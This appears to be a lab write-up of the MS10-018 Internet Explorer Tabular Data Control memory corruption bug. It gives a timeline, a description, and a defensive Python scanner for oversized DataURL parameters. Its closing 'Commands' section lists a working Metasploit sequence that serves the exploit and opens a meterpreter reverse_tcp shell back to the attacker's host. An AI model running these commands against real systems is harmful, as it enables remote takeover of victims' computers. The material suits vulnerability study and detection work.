MS10-018 : Microsoft Internet Explorer Tabular Data Control ActiveX Memory Corruption
Timeline :
Vulnerability privately disclosed to Microsoft by ZDI on 2009-10-20
Microsoft patch “KB980182” provided on 2010-03-30
Metasploit PoC provided by jduck on 2010-04-05
PoC provided by :
Anonymous
jduck
Reference(s) :
Affected version(s) :
Internet Explorer 5
Internet Explorer 6
Tested on Windows XP SP3 with :
Internet Explorer 6 before KB980182
Description :
This module exploits a memory corruption vulnerability in the Internet Explorer Tabular Data ActiveX Control. Microsoft reports that versions 5.01 and 6 of Internet Explorer are vulnerable. By specifying a long value as the “DataURL” parameter to this control, it is possible to write a NUL byte outside the bounds of an array. By targeting control flow data on the stack, an attacker can execute arbitrary code.
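A defensive check for the trigger condition described above, as an added example that is not part of the original post or of the Metasploit module: a Python scanner that flags object elements whose DataURL parameter is unusually long, for use on proxy-captured or cached HTML. The length threshold, the function and class names, and the placeholder classid values in the constructed sample are assumptions.

```python
from html.parser import HTMLParser

# Assumption: the page gives no exact trigger length, so this threshold is a
# tunable heuristic, not a value taken from the advisory.
MAX_DATAURL_LEN = 256


class DataURLScanner(HTMLParser):
    """Flags <param name="DataURL"> values that exceed max_len inside <object>."""

    def __init__(self, max_len=MAX_DATAURL_LEN):
        super().__init__(convert_charrefs=True)
        self.max_len = max_len
        self.object_stack = []  # classid of every <object> currently open
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # html.parser lowercases tag and attribute names; values may be None.
        a = {name: (value or "") for name, value in attrs}
        if tag == "object":
            self.object_stack.append(a.get("classid", ""))
        elif tag == "param" and self.object_stack:
            # Parameter names are matched case-insensitively.
            if a.get("name", "").lower() == "dataurl":
                length = len(a.get("value", ""))
                if length > self.max_len:
                    self.findings.append({"line": self.getpos()[0],
                                          "classid": self.object_stack[-1],
                                          "length": length})

    def handle_endtag(self, tag):
        if tag == "object" and self.object_stack:
            self.object_stack.pop()


def scan_html(html, max_len=MAX_DATAURL_LEN):
    """Return one finding per oversized DataURL parameter in the document."""
    scanner = DataURLScanner(max_len)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: the classid values are placeholders, not real CLSIDs.
SAMPLE = (
    '<html><body>\n'
    '<object classid="clsid:PLACEHOLDER-A"><param name="DataURL" value="data.csv"></object>\n'
    '<object classid="clsid:PLACEHOLDER-B"><PARAM NAME="DataURL" VALUE="' + "A" * 2000 + '"></object>\n'
    '</body></html>\n'
)
```

A hit is a reason to inspect the page, not proof of exploitation; tune the threshold against the DataURL values seen in legitimate intranet pages.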
Commands :
use windows/browser/ms10_018_ie_tabular_activex
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sessions -i 1
sysinfo
getuid
ipconfig